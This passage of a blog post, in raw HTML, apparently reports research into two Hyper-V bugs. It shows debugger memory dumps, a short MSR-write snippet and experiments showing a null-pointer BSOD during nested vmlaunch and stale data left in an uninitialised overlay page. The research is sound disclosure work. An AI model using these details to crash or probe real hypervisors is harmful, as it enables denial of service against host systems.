pre-wrap;">ffffe802`c561c010 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c018 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c020 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c028 </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">00000000`00000001</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> - </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">pHvVpPage->EnlightenVmEntry</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c030 </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">00000000`7ff23000</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">- pHvVpPage->CurrentNestedVmcs</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c038 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c040 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c048 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c050 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c058 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Next action is very simple, if pHvVpPage->EnlightenVmEntry == 0, we get BSOD. Hypervisor simply don’t verified </span><span face="" style="font-size: 10.6667px; text-indent: 0px; white-space: pre-wrap;">VP Assist Page</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> content, when </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">vmlaunch</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is executed.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Overlay page initialization problem</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BSOD is not one problem. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: 0.6em; vertical-align: super;">nd</span></span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> problem, that even </span><span face="" style="font-size: 10.6667px; text-indent: 0px; white-space: pre-wrap;">VP Assist Page was filled with actual values</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> before writing to </span><span face="" style="font-size: 10.6667px; font-weight: 700; text-indent: 0px; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE </span><span face="" style="font-size: 10.6667px; text-indent: 0px; white-space: pre-wrap;">msr,</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> parameters will not be passed to hypervisor. Why it happened? It is feature of hypervisor overlay page (or bug).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span style="font-size: 8pt; text-indent: 35.4pt; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span style="font-size: 8pt; text-indent: 35.4pt; white-space: pre-wrap;">According 5.2.1 section of Hyper-V TLFS 6.0:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span style="font-size: 8pt; text-indent: 35.4pt; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The hypervisor defines several special pages that “overlay” the guest’s GPA space. The hypercall code page is an example of an overlay page. Overlays are addressed by guest physical addresses but are not included in the normal GPA map maintained internally by the hypervisor. Conceptually, they exist in a separate map that overlays the GPA map.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If a page within the GPA space is overlaid, any SPA page mapped to the GPA page is effectively “obscured” and generally unreachable by the virtual processor through processor memory accesses. Furthermore, access rights installed on the underlying GPA page are not honored when accessing an overlay page.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Lets do experiment. Before write address of buffer to <span face="" style="font-weight: 700; text-indent: 0px;">HV_X64_MSR_VP_ASSIST_PAGE </span><span face="" style="text-indent: 0px;">msr</span>, we need allocate it. Fill that buffer with numbers 0x11</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">FillBuffer((</span><span face="" style="background-color: transparent; color: #2b91af; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PCHAR</span><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">)pHvVpPage, </span><span face="" style="background-color: transparent; color: #6f008a; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">PAGE_SIZE</span><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, 0x11);</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">__writemsr(</span><span face="" style="background-color: transparent; color: #6f008a; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HV_X64_MSR_APIC_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, guestPFN.AsUINT64);</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span style="font-size: 8pt; text-align: left; text-indent: 35.4pt; white-space: pre-wrap;">and see it content in LiveCloudKd (we know physical and virtual addresses from standard WinDBG, launching in source mode debugging mode):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="85" src="https://lh6.googleusercontent.com/_eAsytllqD37lUVSYV9FDmIYKwtBKCXE7_rJG0oenMH8xHmkczc4yKg-pYJDHhi6csbJgJu7WAlYvf2REQeM7EyoJGCGM0hiXtbpGUugtgkdnxkG_AOPN6zAgP3nqFn4zIsx5vGZFE9lq-k-_Q" style="margin-left: 0px; margin-top: 0px;" width="464" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In standard attaching to guest OS kernel debugger:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="260" src="https://lh5.googleusercontent.com/K2XExoniultrDyPsrVHUMMo7Tx_0VP2ZOeERiPMaU1pco2pHHzn5vLYHYHlvSm9jelLW558Hu1fxgEFzQrcP0Cy2otLPftgFqOf_W3xO8MIKxSYbff4uvB7GgdIeeIXkPLpV2ciIslXPtKnIQA" style="margin-left: 0px; margin-top: 0px;" width="526" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Attach LiveCloudKd to same VM at same time. First, we can see enlightenment structure. Some values in CurrentNestedVmcs and EnlightenVmEntry</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="143" src="https://lh4.googleusercontent.com/m5ZH8GhZP0i4POJYQKVoCkq4_bOYLRT5Quotz1IzdO9EWpbLVk_lBez6nU3vsKR2lg6p6Hd1AIwtRh_8-ej6hlgP66WyhtBCbNAiZ1E4jFojuz-CAQMic5CMJ_xYhgtyUD-yX-hqS5UkZh2xLw" style="margin-left: 0px; margin-top: 0px;" width="335" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">And see same values in VP Assist Page (we see same address as from standard debugger):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="196" src="https://lh4.googleusercontent.com/86GWnqlREA5cuR2Ai8jJ8dI1lJLDOVQyAqG2kqp30SgsKiIXzfMSWA0MuN5l5W5sp6xaTUt6oUZbmr8VW2g6TVj_rGR8Gmdcowup8U2KXqABl3uJ7q3UGyvCOBTaUGXiBaQeHG2sKDaqVyWRmw" style="margin-left: 0px; margin-top: 0px;" width="346" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After writing to </span><span face="" style="font-size: 10.6667px; font-weight: 700; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE </span><span face="" style="font-size: 10.6667px; white-space: pre-wrap;">msr</span><span style="font-size: 8pt; text-indent: 35.4pt; white-space: pre-wrap;"> we can see some old </span><span style="font-size: 10.6667px; text-indent: 47.2px; white-space: pre-wrap;">garbage</span><span style="font-size: 8pt; text-indent: 35.4pt; white-space: pre-wrap;"> inside hypervisor (Address of overlay page is constant, as we see early. Driver was restarted, guest OS is not rebooted)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WINDBG>dps ffffe802`c561c000</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – inside hypervisor</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c000 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c008 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c010 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c018 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c020 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c028 00000000`00000001</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c030 00000000`7ff23000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c038 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c040 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c048 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c050 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c058 00000000`00000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Return back to guest OS debugger. Yes, 0x11 values in overlay page was replaced by garbage values from last <span face="" style="font-weight: 700; text-indent: 47.2px;">HV_X64_MSR_VP_ASSIST_PAGE</span><span face="" style="color: black; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-indent: 0px; vertical-align: baseline;"> msr writing</span>:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="268" src="https://lh6.googleusercontent.com/JVg9O8fpm-hXjUHzSD3-Lg9kEdO7q8k-xuN4eQm8Ca-FdiB3pck2ldDJnk_BvUvF7JfNbchTcYV83dBh4n1_8GUa83k8m4QYBipgEmmUTK6D29jg9zKtOcyVgVP2Q4nYN7o7GQ7M4B-GvKVOxw" style="margin-left: 0px; margin-top: 0px;" width="440" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 10.6667px; white-space: pre-wrap;">If we want to write something in overlay page after we wrote it address to </span><span face="" style="font-size: 10.6667px; font-weight: 700; text-indent: 47.2px; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span style="font-size: 10.6667px; white-space: pre-wrap;"> msr, all will be correct.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="315" src="https://lh6.googleusercontent.com/2aoazJM7Pl8I9t8Cbgqc3_4D46gJ1SbiOCWeb8NyDbGw6bCni8XPdOsxH9Rt9DHzbvxRdZlrieio75aHjKn5Yy2Ih6ee_tdI7jQL8Agxo65m7H7ZJY8kmIsdin4xv648oG4hzsTK_hRZ-4k9tA" style="margin-left: 0px; margin-top: 0px;" width="412" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">LiveCloudKd shows old values, because it parses original values in guest memory, which is mapping in host OS using MDL and hostPFN-to-GuestPFN page map. Overlay page is stored inside hypervisor and replaced purely, when guest OS try read\write memory from its diapason. Interesting, that page attributes in guest page are not changed.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">What I checked: overlay page </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ffffe802`c561c000</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> inside hypervisor constantly change CR3, but physical address of it doesn’t change. Probably, need additional investigation in it (but it is not bug releated research). </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Conclusion: two bugs was found:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><ul style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; list-style-type: disc; margin-left: 17.4pt; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Incorrect <span style="font-family: "Times New Roman";">VP Assist Page</span> values handling during </span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>vmlaunch</b></span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> emulation, which cause null pointer deference error and next BSOD.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: calibri, sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; list-style-type: disc; margin-left: 17.4pt; text-decoration: none; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;"><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Incorrect handling of overlay page initialize. It simply switched to another memory buffer even without clearing old values, which is stored inside hypervisor, or copying values from guest page, which address was pointed in </span><span style="font-weight: 700; text-indent: 47.2px; white-space: pre-wrap;">HV_X64_MSR_VP_ASSIST_PAGE</span><span face="" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> 